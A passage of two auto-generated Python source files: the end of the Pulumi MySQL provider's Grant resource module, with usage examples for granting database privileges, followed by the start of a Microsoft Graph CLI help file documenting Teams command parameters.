A TLS option for the `GRANT` statement. The value is appended after `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MySQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if the MySQL version is below 5.7.0.
"""
return pulumi.get(self, "tls_option")
@tls_option.setter
def tls_option(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tls_option", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
The name of the user. Conflicts with `role`.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
class Grant(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The ``Grant`` resource creates and manages privileges given to
a user on a MySQL server.
## Examples
### Granting Privileges to a User
```python
import pulumi
import pulumi_mysql as mysql
jdoe_user = mysql.User("jdoeUser",
host="example.com",
plaintext_password="password",
user="jdoe")
jdoe_grant = mysql.Grant("jdoeGrant",
database="app",
host=jdoe_user.host,
privileges=[
"SELECT",
"UPDATE",
],
user=jdoe_user.user)
```
### Granting Privileges to a Role
```python
import pulumi
import pulumi_mysql as mysql
developer_role = mysql.Role("developerRole")
developer_grant = mysql.Grant("developerGrant",
database="app",
privileges=[
"SELECT",
"UPDATE",
],
role=developer_role.name)
```
### Adding a Role to a User
```python
import pulumi
import pulumi_mysql as mysql
jdoe = mysql.User("jdoe",
host="example.com",
plaintext_password="password",
user="jdoe")
developer_role = mysql.Role("developerRole")
developer_grant = mysql.Grant("developerGrant",
database="app",
host=jdoe.host,
roles=[developer_role.name],
user=jdoe.user)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database: The database to grant privileges on.
:param pulumi.Input[bool] grant: Whether to also give the user privileges to grant the same privileges to other users.
:param pulumi.Input[str] host: The source host of the user. Defaults to "localhost". Conflicts with `role`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
:param pulumi.Input[str] role: The role to grant `privileges` to. Conflicts with `user` and `host`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] roles: A list of roles to grant to the user. Conflicts with `privileges`.
:param pulumi.Input[str] table: Which table to grant `privileges` on. Defaults to `*`, which is all tables.
:param pulumi.Input[str] tls_option: A TLS option for the `GRANT` statement. The value is appended after `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MySQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if the MySQL version is below 5.7.0.
:param pulumi.Input[str] user: The name of the user. Conflicts with `role`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GrantArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The ``Grant`` resource creates and manages privileges given to
a user on a MySQL server.
## Examples
### Granting Privileges to a User
```python
import pulumi
import pulumi_mysql as mysql
jdoe_user = mysql.User("jdoeUser",
host="example.com",
plaintext_password="password",
user="jdoe")
jdoe_grant = mysql.Grant("jdoeGrant",
database="app",
host=jdoe_user.host,
privileges=[
"SELECT",
"UPDATE",
],
user=jdoe_user.user)
```
### Granting Privileges to a Role
```python
import pulumi
import pulumi_mysql as mysql
developer_role = mysql.Role("developerRole")
developer_grant = mysql.Grant("developerGrant",
database="app",
privileges=[
"SELECT",
"UPDATE",
],
role=developer_role.name)
```
### Adding a Role to a User
```python
import pulumi
import pulumi_mysql as mysql
jdoe = mysql.User("jdoe",
host="example.com",
plaintext_password="password",
user="jdoe")
developer_role = mysql.Role("developerRole")
developer_grant = mysql.Grant("developerGrant",
database="app",
host=jdoe.host,
roles=[developer_role.name],
user=jdoe.user)
```
:param str resource_name: The name of the resource.
:param GrantArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
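Example (a minimal sketch of the args-object form; the values are illustrative):
```python
import pulumi_mysql as mysql
jdoe_grant = mysql.Grant("jdoeGrant", mysql.GrantArgs(
    database="app",
    host="example.com",
    user="jdoe",
    privileges=["SELECT", "UPDATE"],
))
```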
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GrantArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GrantArgs.__new__(GrantArgs)
if database is None and not opts.urn:
raise TypeError("Missing required property 'database'")
__props__.__dict__["database"] = database
__props__.__dict__["grant"] = grant
__props__.__dict__["host"] = host
__props__.__dict__["privileges"] = privileges
__props__.__dict__["role"] = role
__props__.__dict__["roles"] = roles
__props__.__dict__["table"] = table
__props__.__dict__["tls_option"] = tls_option
__props__.__dict__["user"] = user
super(Grant, __self__).__init__(
'mysql:index/grant:Grant',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
grant: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
privileges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None,
roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
table: Optional[pulumi.Input[str]] = None,
tls_option: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None) -> 'Grant':
"""
Get an existing Grant resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database: The database to grant privileges on.
:param pulumi.Input[bool] grant: Whether to also give the user privileges to grant the same privileges to other users.
:param pulumi.Input[str] host: The source host of the user. Defaults to "localhost". Conflicts with `role`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
:param pulumi.Input[str] role: The role to grant `privileges` to. Conflicts with `user` and `host`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] roles: A list of roles to grant to the user. Conflicts with `privileges`.
:param pulumi.Input[str] table: Which table to grant `privileges` on. Defaults to `*`, which is all tables.
:param pulumi.Input[str] tls_option: A TLS option for the `GRANT` statement. The value is appended after `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MySQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if the MySQL version is below 5.7.0.
:param pulumi.Input[str] user: The name of the user. Conflicts with `role`.
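Example (a minimal sketch; the logical name and provider ID below are placeholders, not a documented ID format):
```python
import pulumi_mysql as mysql
# Adopt an existing grant into the program under the logical name "existingGrant".
existing_grant = mysql.Grant.get("existingGrant", id="<provider-assigned-id>")
```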
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GrantState.__new__(_GrantState)
__props__.__dict__["database"] = database
__props__.__dict__["grant"] = grant
__props__.__dict__["host"] = host
__props__.__dict__["privileges"] = privileges
__props__.__dict__["role"] = role
__props__.__dict__["roles"] = roles
__props__.__dict__["table"] = table
__props__.__dict__["tls_option"] = tls_option
__props__.__dict__["user"] = user
return Grant(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
The database to grant privileges on.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter
def grant(self) -> pulumi.Output[Optional[bool]]:
"""
Whether to also give the user privileges to grant the same privileges to other users.
"""
return pulumi.get(self, "grant")
@property
@pulumi.getter
def host(self) -> pulumi.Output[Optional[str]]:
"""
The source host of the user. Defaults to "localhost". Conflicts with `role`.
"""
return pulumi.get(self, "host")
@property
@pulumi.getter
def privileges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of privileges to grant to the user. Refer to a list of privileges (such as [here](https://dev.mysql.com/doc/refman/5.5/en/grant.html)) for applicable privileges. Conflicts with `roles`.
"""
return pulumi.get(self, "privileges")
@property
@pulumi.getter
def role(self) -> pulumi.Output[Optional[str]]:
"""
The role to grant `privileges` to. Conflicts with `user` and `host`.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter
def roles(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of roles to grant to the user. Conflicts with `privileges`.
"""
return pulumi.get(self, "roles")
@property
@pulumi.getter
def table(self) -> pulumi.Output[Optional[str]]:
"""
Which table to grant `privileges` on. Defaults to `*`, which is all tables.
"""
return pulumi.get(self, "table")
@property
@pulumi.getter(name="tlsOption")
def tls_option(self) -> pulumi.Output[Optional[str]]:
"""
A TLS option for the `GRANT` statement. The value is appended after `REQUIRE`. A value of 'SSL' will generate a `GRANT ... REQUIRE SSL` statement. See the [MySQL `GRANT` documentation](https://dev.mysql.com/doc/refman/5.7/en/grant.html) for more. Ignored if the MySQL version is below 5.7.0.
"""
return pulumi.get(self, "tls_option")
@property
@pulumi.getter
def user(self) -> pulumi.Output[Optional[str]]:
"""
The name of the user. Conflicts with `role`.
"""
return pulumi.get(self, "user")
296f6aa99683c870b479e02273fbee1813436565 | 282,223 | py | Python | msgraph-cli-extensions/v1_0/teams_v1_0/azext_teams_v1_0/generated/_help.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | ["MIT"]
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.help_files import helps
helps['teams_v1_0'] = '''
type: group
short-summary: Manage Teams
'''
helps['teams chat-chat'] = """
type: group
short-summary: Manage chat chat with teams_v1_0
"""
helps['teams chat-chat create-chat'] = """
type: command
short-summary: "Add new entity to chats."
"""
helps['teams chat-chat delete-chat'] = """
type: command
short-summary: "Delete entity from chats."
"""
helps['teams chat-chat list-chat'] = """
type: command
short-summary: "Get entities from chats."
"""
helps['teams chat-chat show-chat'] = """
type: command
short-summary: "Get entity from chats by key."
"""
helps['teams chat-chat update-chat'] = """
type: command
short-summary: "Update entity in chats."
"""
helps['teams chat'] = """
type: group
short-summary: Manage chat with teams_v1_0
"""
helps['teams chat show-all-message'] = """
type: command
short-summary: "Invoke function getAllMessages."
"""
helps['teams group'] = """
type: group
short-summary: Manage group with teams_v1_0
"""
helps['teams group delete-team'] = """
type: command
short-summary: "Delete navigation property team for groups."
"""
helps['teams group show-team'] = """
type: command
short-summary: "Get team from groups."
"""
helps['teams group update-team'] = """
type: command
short-summary: "Update the navigation property team in groups."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable."
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email addresses to which notifications are sent for groups without owners. \
Multiple email addresses can be defined by separating them with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
helps['teams team'] = """
type: group
short-summary: Manage team team with teams_v1_0
"""
helps['teams team list'] = """
type: command
short-summary: "Get entities from teams."
"""
helps['teams team create'] = """
type: command
short-summary: "Add new entity to teams."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
